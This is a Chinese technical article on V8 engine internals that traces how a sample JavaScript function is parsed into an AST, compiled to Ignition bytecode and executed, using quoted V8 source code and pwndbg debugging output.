0x01 前置知识
从源代码到字节码
流程准备
v8执行JS的整个流程如下,JS源码经过Parser翻译为抽象语法树(AST),然后Interpreter遍历AST语法树,生成ByteCode,ByteCode可以直接被解析执行也可以成为热点以后传给TurboFan进行JIT编译,TurboFan解优化时又可以回到字节码进行执行。
上图是一个抽象的概念图,我们来实际研究一下v8的源码,使用如下代码进行测试使用
function fun(x) {
var a = 0x666;
if (x) {
print("hello");
} else {
print("world");
}
return a;
}
fun(true);
fun(false);
%SystemBreak();
首先先打印一遍AST语法树,以便后续分析时对照使用
./d8 b.js --allow-natives-syntax --print-ast
[generating bytecode for function: ]
--- AST ---
FUNC at 0
. KIND 0
. SUSPEND COUNT 0
. NAME ""
. INFERRED NAME ""
. DECLS
. . FUNCTION "fun" = function fun
. EXPRESSION STATEMENT at 125
. . CALL
. . . VAR PROXY unallocated (0x55c8247ae8b8) (mode = VAR, assigned = true) "fun"
. . . LITERAL true
. EXPRESSION STATEMENT at 136
. . CALL
. . . VAR PROXY unallocated (0x55c8247ae8b8) (mode = VAR, assigned = true) "fun"
. . . LITERAL false
. EXPRESSION STATEMENT at 148
. . ASSIGN at -1
. . . VAR PROXY local[0] (0x55c8247aea98) (mode = TEMPORARY, assigned = true) ".result"
. . . CALL RUNTIME SystemBreak at 148
. RETURN at -1
. . VAR PROXY local[0] (0x55c8247aea98) (mode = TEMPORARY, assigned = true) ".result"
[generating bytecode for function: fun]
--- AST ---
FUNC at 12
. KIND 0
. SUSPEND COUNT 0
. NAME "fun"
. PARAMS
. . VAR (0x55c8247b0908) (mode = VAR, assigned = false) "x"
. DECLS
. . VARIABLE (0x55c8247b0908) (mode = VAR, assigned = false) "x"
. . VARIABLE (0x55c8247b09b0) (mode = VAR, assigned = false) "a"
. BLOCK NOCOMPLETIONS at -1
. . EXPRESSION STATEMENT at 29
. . . INIT at 29
. . . . VAR PROXY local[0] (0x55c8247b09b0) (mode = VAR, assigned = false) "a"
. . . . LITERAL 1638
. IF at 39
. . CONDITION at 43
. . . VAR PROXY parameter[0] (0x55c8247b0908) (mode = VAR, assigned = false) "x"
. . THEN at -1
. . . BLOCK at -1
. . . . EXPRESSION STATEMENT at 54
. . . . . CALL
. . . . . . VAR PROXY unallocated (0x55c8247b0f88) (mode = DYNAMIC_GLOBAL, assigned = false) "print"
. . . . . . LITERAL "hello"
. . ELSE at -1
. . . BLOCK at -1
. . . . EXPRESSION STATEMENT at 88
. . . . . CALL
. . . . . . VAR PROXY unallocated (0x55c8247b0f88) (mode = DYNAMIC_GLOBAL, assigned = false) "print"
. . . . . . LITERAL "world"
. RETURN at 112
. . VAR PROXY local[0] (0x55c8247b09b0) (mode = VAR, assigned = false) "a"
d8中的Shell::ExecuteString
函数是执行js的入口,它调用了ScriptCompiler::Compile
函数进行脚本的编译
maybe_script = ScriptCompiler::Compile(
context, &script_source, ScriptCompiler::kNoCompileOptions);
跟踪该函数,它只是简单的设置参数,然后继续调用了CompileUnboundInternal
函数,该函数如下:
MaybeLocal<UnboundScript> ScriptCompiler::CompileUnboundInternal(
Isolate* v8_isolate, Source* source, CompileOptions options,
NoCacheReason no_cache_reason) {
...................
i::Handle<i::SharedFunctionInfo> result;
................
i::MaybeHandle<i::SharedFunctionInfo> maybe_function_info =
i::Compiler::GetSharedFunctionInfoForScript(
isolate, str, script_details, source->resource_options, nullptr,
script_data, options, no_cache_reason, i::NOT_NATIVES_CODE);
................
has_pending_exception = !maybe_function_info.ToHandle(&result);
RETURN_ON_FAILED_EXECUTION(UnboundScript);
RETURN_ESCAPED(ToApiHandle<UnboundScript>(result));
}
可见其调用了GetSharedFunctionInfoForScript
生成函数的一些信息,我们跟进去查看
MaybeHandle<SharedFunctionInfo> Compiler::GetSharedFunctionInfoForScript(
Isolate* isolate, Handle<String> source,
const Compiler::ScriptDetails& script_details,
ScriptOriginOptions origin_options, v8::Extension* extension,
ScriptData* cached_data, ScriptCompiler::CompileOptions compile_options,
ScriptCompiler::NoCacheReason no_cache_reason, NativesFlag natives) {
ScriptCompileTimerScope compile_timer(isolate, no_cache_reason);
.......................
// Do a lookup in the compilation cache but not for extensions.
MaybeHandle<SharedFunctionInfo> maybe_result;
IsCompiledScope is_compiled_scope;
if (extension == nullptr) {
bool can_consume_code_cache =
compile_options == ScriptCompiler::kConsumeCodeCache;
if (can_consume_code_cache) {
compile_timer.set_consuming_code_cache();
}
// First check per-isolate compilation cache.
maybe_result = compilation_cache->LookupScript(
source, script_details.name_obj, script_details.line_offset,
script_details.column_offset, origin_options, isolate->native_context(),
language_mode);
if (!maybe_result.is_null()) {
compile_timer.set_hit_isolate_cache();
} else if (can_consume_code_cache) {
compile_timer.set_consuming_code_cache();
// Then check cached code provided by embedder.
..........................
maybe_result = inner_result;
} else {
// Deserializer failed. Fall through to compile.
compile_timer.set_consuming_code_cache_failed();
}
}
}
if (maybe_result.is_null()) {
ParseInfo parse_info(isolate);
// No cache entry found compile the script.
NewScript(isolate, &parse_info, source, script_details, origin_options,
natives);
// Compile the function and add it to the isolate cache.
if (origin_options.IsModule()) parse_info.set_module();
parse_info.set_extension(extension);
parse_info.set_eager(compile_options == ScriptCompiler::kEagerCompile);
parse_info.set_language_mode(
stricter_language_mode(parse_info.language_mode(), language_mode));
maybe_result = CompileToplevel(&parse_info, isolate, &is_compiled_scope);
Handle<SharedFunctionInfo> result;
if (extension == nullptr && maybe_result.ToHandle(&result)) {
DCHECK(is_compiled_scope.is_compiled());
compilation_cache->PutScript(source, isolate->native_context(),
language_mode, result);
} else if (maybe_result.is_null() && natives != EXTENSION_CODE &&
natives != NATIVES_CODE) {
isolate->ReportPendingMessages();
}
}
return maybe_result;
}
可以看到,这里是对函数进行编译,首先检查是否已有缓存可用,如果没有,则开始新的编译,主要调用了CompileToplevel
函数
MaybeHandle<SharedFunctionInfo> CompileToplevel(
ParseInfo* parse_info, Isolate* isolate,
IsCompiledScope* is_compiled_scope) {
................
if (parse_info->literal() == nullptr &&
!parsing::ParseProgram(parse_info, isolate)) {
return MaybeHandle<SharedFunctionInfo>();
}
................
// Generate the unoptimized bytecode or asm-js data.
MaybeHandle<SharedFunctionInfo> shared_info =
GenerateUnoptimizedCodeForToplevel(
isolate, parse_info, isolate->allocator(), is_compiled_scope);
...............
FinalizeScriptCompilation(isolate, parse_info);
return shared_info;
}
该函数主要进行了三个操作,ParseProgram
生成AST语法树,调用GenerateUnoptimizedCodeForToplevel
生成字节码,最后调用FinalizeScriptCompilation
做一些后续工作。
ParseProgram ParseProgram调用了DoParseProgram来完成解析的任务
FunctionLiteral* Parser::DoParseProgram(Isolate* isolate, ParseInfo* info) {
// Note that this function can be called from the main thread or from a
// background thread. We should not access anything Isolate / heap dependent
// via ParseInfo, and also not pass it forward. If not on the main thread
// isolate will be nullptr.
DCHECK_EQ(parsing_on_main_thread_, isolate != nullptr);
DCHECK_NULL(scope_);
DCHECK_NULL(target_stack_);
ParsingModeScope mode(this, allow_lazy_ ? PARSE_LAZILY : PARSE_EAGERLY);
ResetFunctionLiteralId();
DCHECK(info->function_literal_id() == FunctionLiteral::kIdTypeTopLevel ||
info->function_literal_id() == FunctionLiteral::kIdTypeInvalid);
FunctionLiteral* result = nullptr;
{
Scope* outer = original_scope_;
DCHECK_NOT_NULL(outer);
if (info->is_eval()) {
outer = NewEvalScope(outer);
} else if (parsing_module_) {
DCHECK_EQ(outer, info->script_scope());
outer = NewModuleScope(info->script_scope());
}
DeclarationScope* scope = outer->AsDeclarationScope();
scope->set_start_position(0);
FunctionState function_state(&function_state_, &scope_, scope);
ScopedPtrList<Statement> body(pointer_buffer());
..................
} else {
// Don't count the mode in the use counters--give the program a chance
// to enable script-wide strict mode below.
this->scope()->SetLanguageMode(info->language_mode());
ParseStatementList(&body, Token::EOS);
}
...................................
info->set_max_function_literal_id(GetLastFunctionLiteralId());
// Make sure the target stack is empty.
DCHECK_NULL(target_stack_);
if (has_error()) return nullptr;
return result;
}
该函数主要调用了ParseStatementList
函数,而该函数又调用ParseStatementListItem
template <typename Impl>
typename ParserBase<Impl>::StatementT
ParserBase<Impl>::ParseStatementListItem() {
// ECMA 262 6th Edition
// StatementListItem[Yield, Return] :
// Statement[?Yield, ?Return]
// Declaration[?Yield]
//
// Declaration[Yield] :
// HoistableDeclaration[?Yield]
// ClassDeclaration[?Yield]
// LexicalDeclaration[In, ?Yield]
//
// HoistableDeclaration[Yield, Default] :
// FunctionDeclaration[?Yield, ?Default]
// GeneratorDeclaration[?Yield, ?Default]
//
// LexicalDeclaration[In, Yield] :
// LetOrConst BindingList[?In, ?Yield] ;
switch (peek()) {
case Token::FUNCTION:
return ParseHoistableDeclaration(nullptr, false);
case Token::CLASS:
Consume(Token::CLASS);
return ParseClassDeclaration(nullptr, false);
case Token::VAR:
case Token::CONST:
return ParseVariableStatement(kStatementListItem, nullptr);
case Token::LET:
if (IsNextLetKeyword()) {
return ParseVariableStatement(kStatementListItem, nullptr);
}
break;
case Token::ASYNC:
if (PeekAhead() == Token::FUNCTION &&
!scanner()->HasLineTerminatorAfterNext()) {
Consume(Token::ASYNC);
return ParseAsyncFunctionDeclaration(nullptr, false);
}
break;
default:
break;
}
return ParseStatement(nullptr, nullptr, kAllowLabelledFunctionStatement);
}
该函数根据token的类型调用不同的解析函数进行解析。每个Parse函数内又调用其他Parse解析子语句,最终生成一个StatementT
节点,这是一种递归下降的分析方法。解析后通过body->Add(stat);
将StatementT
按照顺序添加到序列中。解析完成后回到DoParseProgram
函数
this->scope()->SetLanguageMode(info->language_mode());
ParseStatementList(&body, Token::EOS);
}
// The parser will peek but not consume EOS. Our scope logically goes all
// the way to the EOS, though.
scope->set_end_position(peek_position());
.....................
.....................
int parameter_count = parsing_module_ ? 1 : 0;
result = factory()->NewScriptOrEvalFunctionLiteral(
scope, body, function_state.expected_property_count(), parameter_count);
result->set_suspend_count(function_state.suspend_count());
}
info->set_max_function_literal_id(GetLastFunctionLiteralId());
// Make sure the target stack is empty.
DCHECK_NULL(target_stack_);
if (has_error()) return nullptr;
return result;
}
通过NewScriptOrEvalFunctionLiteral创建了一个FunctionLiteral对象,并将body等数据包装在内,然后将其作为结果返回。返回到ParseProgram
函数以后,将FunctionLiteral对象设置到info中,然后将info返回。
result = parser.ParseProgram(isolate, info);
info->set_literal(result);
if (result == nullptr) {
info->pending_error_handler()->ReportErrors(isolate, info->script(),
info->ast_value_factory());
} else {
info->set_language_mode(info->literal()->language_mode());
if (info->is_eval()) {
info->set_allow_eval_cache(parser.allow_eval_cache());
}
}
parser.UpdateStatistics(isolate, info->script());
return (result != nullptr);
}
GenerateUnoptimizedCodeForToplevel
接下来回到CompileToplevel
,有一点需要解释的是Toplevel的意思就是在脚本最外层的语句,如
var x = 1;
print(x);
funtion fun() {
var a = 1;
var b = 2;
}
其中在函数外面的以及function
fun()这个声明都属Toplevle,而在函数内部的则属于non
Toplevel。解析函数时通过调用ParseHoistableDeclaration
可以将函数中non-Toplevel部分解析。ParseProgram
得到AST以后,接下来调用GenerateUnoptimizedCodeForToplevel
函数生成字节码。
MaybeHandle<SharedFunctionInfo> GenerateUnoptimizedCodeForToplevel(
Isolate* isolate, ParseInfo* parse_info, AccountingAllocator* allocator,
IsCompiledScope* is_compiled_scope) {
EnsureSharedFunctionInfosArrayOnScript(parse_info, isolate);
parse_info->ast_value_factory()->Internalize(isolate);
if (!Compiler::Analyze(parse_info)) return MaybeHandle<SharedFunctionInfo>();
DeclarationScope::AllocateScopeInfos(parse_info, isolate);
// Prepare and execute compilation of the outer-most function.
// Create the SharedFunctionInfo and add it to the script's list.
Handle<Script> script = parse_info->script();
Handle<SharedFunctionInfo> top_level =
isolate->factory()->NewSharedFunctionInfoForLiteral(parse_info->literal(),
script, true);
该函数先是调用NewSharedFunctionInfoForLiteral
函数从parse_info->literal()生成一个SharedFunctionInfo
对象,并且该对象会被添加到全局的list列表中
Handle<SharedFunctionInfo> Factory::NewSharedFunctionInfoForLiteral(
FunctionLiteral* literal, Handle<Script> script, bool is_toplevel) {
FunctionKind kind = literal->kind();
Handle<SharedFunctionInfo> shared = NewSharedFunctionInfoForBuiltin(
literal->name(), Builtins::kCompileLazy, kind);
SharedFunctionInfo::InitFromFunctionLiteral(shared, literal, is_toplevel);
SharedFunctionInfo::SetScript(shared, script, literal->function_literal_id(),
false);
return shared;
}
void SharedFunctionInfo::SetScript(Handle<SharedFunctionInfo> shared,
Handle<Object> script_object,
int function_literal_id,
bool reset_preparsed_scope_data) {
if (shared->script() == *script_object) return;
Isolate* isolate = shared->GetIsolate();
if (reset_preparsed_scope_data &&
shared->HasUncompiledDataWithPreparseData()) {
shared->ClearPreparseData();
}
// Add shared function info to new script's list. If a collection occurs,
// the shared function info may be temporarily in two lists.
// This is okay because the gc-time processing of these lists can tolerate
// duplicates.
if (script_object->IsScript()) {
DCHECK(!shared->script()->IsScript());
Handle<Script> script = Handle<Script>::cast(script_object);
Handle<WeakFixedArray> list =
handle(script->shared_function_infos(), isolate);
#ifdef DEBUG
DCHECK_LT(function_literal_id, list->length());
MaybeObject maybe_object = list->Get(function_literal_id);
HeapObject heap_object;
if (maybe_object->GetHeapObjectIfWeak(&heap_object)) {
DCHECK_EQ(heap_object, *shared);
}
#endif
list->Set(function_literal_id, HeapObjectReference::Weak(*shared));
.....................................
接下来就是编译函数了
std::vector<FunctionLiteral*> functions_to_compile;
functions_to_compile.push_back(parse_info->literal());
while (!functions_to_compile.empty()) {
FunctionLiteral* literal = functions_to_compile.back();
functions_to_compile.pop_back();
Handle<SharedFunctionInfo> shared_info =
Compiler::GetSharedFunctionInfo(literal, script, isolate);
if (shared_info->is_compiled()) continue;
if (UseAsmWasm(literal, parse_info->is_asm_wasm_broken())) {
..............................
}
std::unique_ptr<UnoptimizedCompilationJob> job(
interpreter::Interpreter::NewCompilationJob(
parse_info, literal, allocator, &functions_to_compile));
if (job->ExecuteJob() == CompilationJob::FAILED ||
FinalizeUnoptimizedCompilationJob(job.get(), shared_info, isolate) ==
CompilationJob::FAILED) {
return MaybeHandle<SharedFunctionInfo>();
}
主要是创建了NewCompilationJob
对象,然后调用ExecuteJob
,实际上调用的函数是InterpreterCompilationJob::Status InterpreterCompilationJob::ExecuteJobImpl()
InterpreterCompilationJob::Status InterpreterCompilationJob::ExecuteJobImpl() {
RuntimeCallTimerScope runtimeTimerScope(
parse_info()->runtime_call_stats(),
parse_info()->on_background_thread()
? RuntimeCallCounterId::kCompileBackgroundIgnition
: RuntimeCallCounterId::kCompileIgnition);
// TODO(lpy): add support for background compilation RCS trace.
TRACE_EVENT0(TRACE_DISABLED_BY_DEFAULT("v8.compile"), "V8.CompileIgnition");
// Print AST if flag is enabled. Note, if compiling on a background thread
// then ASTs from different functions may be intersperse when printed.
MaybePrintAst(parse_info(), compilation_info());
generator()->GenerateBytecode(stack_limit());
if (generator()->HasStackOverflow()) {
return FAILED;
}
return SUCCEEDED;
}
该函数又调用了GenerateBytecode
,而GenerateBytecode继续调用GenerateBytecodeBody
void BytecodeGenerator::GenerateBytecodeBody() {
// Build the arguments object if it is used.
VisitArgumentsObject(closure_scope()->arguments());
// Build rest arguments array if it is used.
Variable* rest_parameter = closure_scope()->rest_parameter();
VisitRestArgumentsArray(rest_parameter);
// Build assignment to the function name or {.this_function}
// variables if used.
VisitThisFunctionVariable(closure_scope()->function_var());
VisitThisFunctionVariable(closure_scope()->this_function_var());
// Build assignment to {new.target} variable if it is used.
VisitNewTargetVariable(closure_scope()->new_target_var());
// Create a generator object if necessary and initialize the
// {.generator_object} variable.
if (IsResumableFunction(info()->literal()->kind())) {
BuildGeneratorObjectVariableInitialization();
}
// Emit tracing call if requested to do so.
if (FLAG_trace) builder()->CallRuntime(Runtime::kTraceEnter);
// Emit type profile call.
if (info()->collect_type_profile()) {
feedback_spec()->AddTypeProfileSlot();
int num_parameters = closure_scope()->num_parameters();
for (int i = 0; i < num_parameters; i++) {
Register parameter(builder()->Parameter(i));
builder()->LoadAccumulatorWithRegister(parameter).CollectTypeProfile(
closure_scope()->parameter(i)->initializer_position());
}
}
// Visit declarations within the function scope.
VisitDeclarations(closure_scope()->declarations());
// Emit initializing assignments for module namespace imports (if any).
VisitModuleNamespaceImports();
// Perform a stack-check before the body.
builder()->StackCheck(info()->literal()->start_position());
// The derived constructor case is handled in VisitCallSuper.
if (IsBaseConstructor(function_kind()) &&
info()->literal()->requires_instance_members_initializer()) {
BuildInstanceMemberInitialization(Register::function_closure(),
builder()->Receiver());
}
// Visit statements in the function body.
VisitStatements(info()->literal()->body());
// Emit an implicit return instruction in case control flow can fall off the
// end of the function without an explicit return being present on all paths.
if (builder()->RequiresImplicitReturn()) {
builder()->LoadUndefined();
BuildReturn();
}
}
其中的VisitDeclarations
用于处理函数中的变量声名,VisitStatements
用于处理语句。其中的参数info()->literal()->body()
是在Parser阶段生成的AST,VisitStatements实际上就是在遍历AST,然后生成对应的字节码。
void BytecodeGenerator::VisitStatements(
const ZonePtrList<Statement>* statements) {
for (int i = 0; i < statements->length(); i++) {
// Allocate an outer register allocations scope for the statement.
RegisterAllocationScope allocation_scope(this);
Statement* stmt = statements->at(i);
Visit(stmt);
if (builder()->RemainderOfBlockIsDead()) break;
}
}
FinalizeUnoptimizedCompilationJob
当AST遍历结束后,回到GenerateUnoptimizedCodeForToplevel函数,调用FinalizeUnoptimizedCompilationJob
完成后续步骤
CompilationJob::Status FinalizeUnoptimizedCompilationJob(
UnoptimizedCompilationJob* job, Handle<SharedFunctionInfo> shared_info,
Isolate* isolate) {
UnoptimizedCompilationInfo* compilation_info = job->compilation_info();
ParseInfo* parse_info = job->parse_info();
SetSharedFunctionFlagsFromLiteral(compilation_info->literal(), shared_info);
CompilationJob::Status status = job->FinalizeJob(shared_info, isolate);
if (status == CompilationJob::SUCCEEDED) {
InstallUnoptimizedCode(compilation_info, shared_info, parse_info, isolate);
CodeEventListener::LogEventsAndTags log_tag;
if (parse_info->is_toplevel()) {
log_tag = compilation_info->is_eval() ? CodeEventListener::EVAL_TAG
: CodeEventListener::SCRIPT_TAG;
} else {
log_tag = parse_info->lazy_compile() ? CodeEventListener::LAZY_COMPILE_TAG
: CodeEventListener::FUNCTION_TAG;
}
job->RecordFunctionCompilation(log_tag, shared_info, isolate);
job->RecordCompilationStats(isolate);
}
return status;
}
这里主要是通过InstallUnoptimizedCode
将相关信息(字节码等)设置到shared_info
中。这样,我们就完成了脚本的编译。
字节码执行
最后返回到d8的bool Shell::ExecuteString
时,执行aybe_result = script->Run(realm);
运行字节码。
MaybeLocal<Value> Script::Run(Local<Context> context) {
auto isolate = reinterpret_cast<i::Isolate*>(context->GetIsolate());
TRACE_EVENT_CALL_STATS_SCOPED(isolate, "v8", "V8.Execute");
ENTER_V8(isolate, context, Script, Run, MaybeLocal<Value>(),
InternalEscapableScope);
i::HistogramTimerScope execute_timer(isolate->counters()->execute(), true);
i::AggregatingHistogramTimerScope timer(isolate->counters()->compile_lazy());
i::TimerEventScope<i::TimerEventExecute> timer_scope(isolate);
auto fun = i::Handle<i::JSFunction>::cast(Utils::OpenHandle(this));
i::Handle<i::Object> receiver = isolate->global_proxy();
Local<Value> result;
has_pending_exception = !ToLocal<Value>(
i::Execution::Call(isolate, fun, receiver, 0, nullptr), &result);
RETURN_ON_FAILED_EXECUTION(Value);
RETURN_ESCAPED(result);
}
先是取到脚本对象,我们调试查看一下对象
auto fun = i::Handle<i::JSFunction>::cast(Utils::OpenHandle(this));
pwndbg> p fun
$2 = {
<v8::internal::HandleBase> = {
location_ = 0x55dab8532088
}, <No data fields>}
pwndbg> x /20gx 0x55dab8532088
0x55dab8532088: 0x000022c98b41e9f9 0x000022c98b41e869
0x55dab8532098: 0x000022c98b41e979 0x000022c98b41e869
0x55dab85320a8: 0x000022c98b41ea39 0x000022c98b41ea79
0x55dab85320b8: 0x000022c98b41ea89 0x000022c98b41e739
0x55dab85320c8: 0x000022c98b401749 0x00001b8cd50805b1
0x55dab85320d8: 0x1baddead0baddeaf 0x1baddead0baddeaf
0x55dab85320e8: 0x1baddead0baddeaf 0x1baddead0baddeaf
0x55dab85320f8: 0x1baddead0baddeaf 0x1baddead0baddeaf
0x55dab8532108: 0x1baddead0baddeaf 0x1baddead0baddeaf
0x55dab8532118: 0x1baddead0baddeaf 0x1baddead0baddeaf
pwndbg> job 0x000022c98b41e9f9
0x22c98b41e9f9: [Function] in OldSpace
- map: 0x0a2f0d2803b9 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x22c98b401ff1 <JSFunction (sfi = 0x38046d688009)>
- elements: 0x1b8cd5080c21 <FixedArray[0]> [HOLEY_ELEMENTS]
- function prototype:
- initial_map:
- shared_info: 0x22c98b41e869 <SharedFunctionInfo>
- name: 0x1b8cd5080751 <String[#0]: >
- formal_parameter_count: 0
- kind: NormalFunction
- context: 0x22c98b401749 <NativeContext[247]>
- code: 0x3d3e6a804281 <Code BUILTIN InterpreterEntryTrampoline>
- interpreted
- bytecode: 0x22c98b41e979 <BytecodeArray[54]>
- source code: function fun(x) {
var a = 0x666;
if (x) {
print("hello");
} else {
print("world");
}
return a;
}
fun(true);
fun(false);
%SystemBreak();
- properties: 0x1b8cd5080c21 <FixedArray[0]> {
#length: 0x38046d6804b9 <AccessorInfo> (const accessor descriptor)
#name: 0x38046d680449 <AccessorInfo> (const accessor descriptor)
#arguments: 0x38046d680369 <AccessorInfo> (const accessor descriptor)
#caller: 0x38046d6803d9 <AccessorInfo> (const accessor descriptor)
#prototype: 0x38046d680529 <AccessorInfo> (const accessor descriptor)
}
- feedback vector: 0x22c98b41ea39: [FeedbackVector] in OldSpace
- map: 0x1b8cd5080bc1 <Map>
- length: 3
- shared function info: 0x22c98b41e869 <SharedFunctionInfo>
- optimized code/marker: OptimizationMarker::kNone
- invocation count: 0
- profiler ticks: 0
- slot #0 LoadGlobalNotInsideTypeof UNINITIALIZED {
[0]: [cleared]
[1]: 0x1b8cd5084da9 <Symbol: (uninitialized_symbol)>
}
- slot #2 kCreateClosure {
[2]: 0x22c98b41ea79 <FeedbackCell[no feedback]>
}
接下来调用Execution::Call
去执行,我们继续跟进,最终来到execution.cc中的V8_WARN_UNUSED_RESULT MaybeHandle<Object> Invoke
函数
In file: /home/sea/Desktop/v8/src/execution.cc
239 Handle<Code> code =
240 JSEntry(isolate, params.execution_target, params.is_construct);
241 {
242 // Save and restore context around invocation and block the
243 // allocation of handles without explicit handle scopes.
► 244 SaveContext save(isolate);
245 SealHandleScope shs(isolate);
246
247 if (FLAG_clear_exceptions_on_js_entry) isolate->clear_pending_exception();
248
249 if (params.execution_target == Execution::Target::kCallable) {
这里创建了一个JSEntry对象
pwndbg> p code
$5 = {
<v8::internal::HandleBase> = {
location_ = 0x5648828e5e68
}, <No data fields>}
pwndbg> x /20gx 0x5648828e5e68
0x5648828e5e68: 0x000018d75d483bc1 0x000018d75d483c21
0x5648828e5e78: 0x000018d75d483c81 0x000018d75d483ce1
0x5648828e5e88: 0x000018d75d483d41 0x000018d75d483da1
0x5648828e5e98: 0x000018d75d483e01 0x000018d75d483e61
0x5648828e5ea8: 0x000018d75d483ec1 0x000018d75d483f21
0x5648828e5eb8: 0x000018d75d483f81 0x000018d75d483fe1
0x5648828e5ec8: 0x000018d75d484041 0x000018d75d4840a1
0x5648828e5ed8: 0x000018d75d484101 0x000018d75d484161
0x5648828e5ee8: 0x000018d75d4841c1 0x000018d75d484221
0x5648828e5ef8: 0x000018d75d484281 0x000018d75d4842e1
pwndbg> job 0x000018d75d483bc1
0x18d75d483bc1: [Code]
- map: 0x1b37e74809e1 <Map>
kind = BUILTIN
name = JSEntry
compiler = unknown
address = 0x7ffcf9e0d580
Trampoline (size = 13)
0x18d75d483c00 0 49ba80b02ca4af7f0000 REX.W movq r10,0x7fafa42cb080 (JSEntry)
0x18d75d483c0a a 41ffe2 jmp r10
Instructions (size = 208)
0x7fafa42cb080 0 55 push rbp
0x7fafa42cb081 1 4889e5 REX.W movq rbp,rsp
0x7fafa42cb084 4 6a02 push 0x2
0x7fafa42cb086 6 4883ec08 REX.W subq rsp,0x8
0x7fafa42cb08a a 4154 push r12
0x7fafa42cb08c c 4155 push r13
0x7fafa42cb08e e 4156 push r14
.......................................
接下来将func作为参数传给JSEntry,并执行
In file: /home/sea/Desktop/v8/src/execution.cc
260 Address orig_func = params.new_target->ptr();
261 Address func = params.target->ptr();
262 Address recv = params.receiver->ptr();
263 Address** argv = reinterpret_cast<Address**>(params.argv);
264 RuntimeCallTimerScope timer(isolate, RuntimeCallCounterId::kJS_Execution);
► 265 value = Object(stub_entry.Call(isolate->isolate_data()->isolate_root(),
266 orig_func, func, recv, params.argc, argv));
267 } else {
268 DCHECK_EQ(Execution::Target::kRunMicrotasks, params.execution_target);
269
270 // clang-format off
我们单步跟入,接下来会执行Builtins_JSEntryTrampoline
0x7fafa42cb0f2 <Builtins_JSEntry+114> push 0
0x7fafa42cb0f4 <Builtins_JSEntry+116> mov r10, qword ptr [r13 + 0x2e28]
0x7fafa42cb0fb <Builtins_JSEntry+123> push qword ptr [r10]
0x7fafa42cb0fe <Builtins_JSEntry+126> mov r10, qword ptr [r13 + 0x2e28]
0x7fafa42cb105 <Builtins_JSEntry+133> mov qword ptr [r10], rsp
► 0x7fafa42cb108 <Builtins_JSEntry+136> call Builtins_JSEntryTrampoline <Builtins_JSEntryTrampoline>
rdi: 0x5648828dfec0 —▸ 0x1b37e7480751 ◂— 0x5200001b37e74804
rsi: 0x1b37e74804d1 ◂— 0x1b37e74805
rdx: 0x19494b71e9f9 ◂— 0x21000025b6b56803
rcx: 0x38c735b01521 ◂— 0x21000025b6b5687f
0x7fafa42cb10d <Builtins_JSEntry+141> mov r10, qword ptr [r13 + 0x2e28]
0x7fafa42cb114 <Builtins_JSEntry+148> pop qword ptr [r10]
0x7fafa42cb117 <Builtins_JSEntry+151> add rsp, 8
0x7fafa42cb11b <Builtins_JSEntry+155> pop rbx
0x7fafa42cb11c <Builtins_JSEntry+156> cmp rbx, 2
继续跟进,最终执行到Builtins_CallFunction_ReceiverIsAny+311时,其中rdi为func对象,这里从对象中取了一个index,并根据index取了一个函数进行调用
► 0x7fafa42bbab7 <Builtins_CallFunction_ReceiverIsAny+311> mov rcx, qword ptr [rdi + 0x2f]
0x7fafa42bbabb <Builtins_CallFunction_ReceiverIsAny+315> cmp dword ptr [rcx + 0x3b], -1
0x7fafa42bbabf <Builtins_CallFunction_ReceiverIsAny+319> jne Builtins_CallFunction_ReceiverIsAny+334 <Builtins_CallFunction_ReceiverIsAny+334>
↓
0x7fafa42bbace <Builtins_CallFunction_ReceiverIsAny+334> mov ecx, dword ptr [rcx + 0x3b]
0x7fafa42bbad1 <Builtins_CallFunction_ReceiverIsAny+337> mov rcx, qword ptr [r13 + rcx*8 + 0x2f70]
0x7fafa42bbad9 <Builtins_CallFunction_ReceiverIsAny+345> jmp rcx
继续执行,可以发现调用的函数是Builtins_InterpreterEntryTrampoline
,这个函数正是我们在func对象结构中看到的code处指向的函数
0x7fafa42bbab7 <Builtins_CallFunction_ReceiverIsAny+311> mov rcx, qword ptr [rdi + 0x2f]
0x7fafa42bbabb <Builtins_CallFunction_ReceiverIsAny+315> cmp dword ptr [rcx + 0x3b], -1
0x7fafa42bbabf <Builtins_CallFunction_ReceiverIsAny+319> jne Builtins_CallFunction_ReceiverIsAny+334 <Builtins_CallFunction_ReceiverIsAny+334>
↓
0x7fafa42bbace <Builtins_CallFunction_ReceiverIsAny+334> mov ecx, dword ptr [rcx + 0x3b]
0x7fafa42bbad1 <Builtins_CallFunction_ReceiverIsAny+337> mov rcx, qword ptr [r13 + rcx*8 + 0x2f70]
► 0x7fafa42bbad9 <Builtins_CallFunction_ReceiverIsAny+345> jmp rcx <Builtins_InterpreterEntryTrampoline>
由此可以知道,但执行一个JS函数时,入口函数是code指向的函数,这种特性非常的方便,因为如果要对一个函数进行JIT优化,可以直接将code指向优化后的函数,如果解优化,则再将code改回去即可。甚至还可以进行延迟编译,有时候我们并不需要立即将所有的函数都编译为字节码,在调用的时候再编译也是可以的,将code指向CompileLazy函数即可。我们继续跟踪,看看字节码是如何被解释执行的。
Builtins_InterpreterEntryTrampoline主要是做一些初始化工作,然后就进行第一条ByteCode的Handler
0x7fafa42d5d2b <Builtins_InterpreterEntryTrampoline+939> je Builtins_InterpreterEntryTrampoline+946 <Builtins_InterpreterEntryTrampoline+946>
↓
0x7fafa42d5d32 <Builtins_InterpreterEntryTrampoline+946> mov rax, qword ptr [r13 - 0x28]
0x7fafa42d5d36 <Builtins_InterpreterEntryTrampoline+950> mov r15, qword ptr [r13 + 0x1608]
0x7fafa42d5d3d <Builtins_InterpreterEntryTrampoline+957> movzx r11d, byte ptr [r14 + r9]
0x7fafa42d5d42 <Builtins_InterpreterEntryTrampoline+962> mov rcx, qword ptr [r15 + r11*8]
► 0x7fafa42d5d46 <Builtins_InterpreterEntryTrampoline+966> call rcx <Builtins_LdaConstantHandler>
rdi: 0x19494b71e9f9 ◂— 0x21000025b6b56803
rsi: 0x19494b701749 ◂— 0x1b37e7480f
rdx: 0x1b37e74804d1 ◂— 0x1b37e74805
rcx: 0x7fafa47ae180 (Builtins_LdaConstantHandler) ◂— lea rbx, [rip - 7]
每一个bytecode都对应了一个Handler,当进入首个Handler以后,就不再需要主控去调度执行下一个bytecode了,因为每个Handler以自动机的形式实现了在结尾自动执行到下一个bytecode的Handler里,如下所示
0x7f0a68ec946e <Builtins_LdaConstantHandler+750> mov r15, qword ptr [rbp - 0x20]
0x7f0a68ec9472 <Builtins_LdaConstantHandler+754> mov rcx, qword ptr [r15 + r8*8]
0x7f0a68ec9476 <Builtins_LdaConstantHandler+758> mov rbp, qword ptr [rbp]
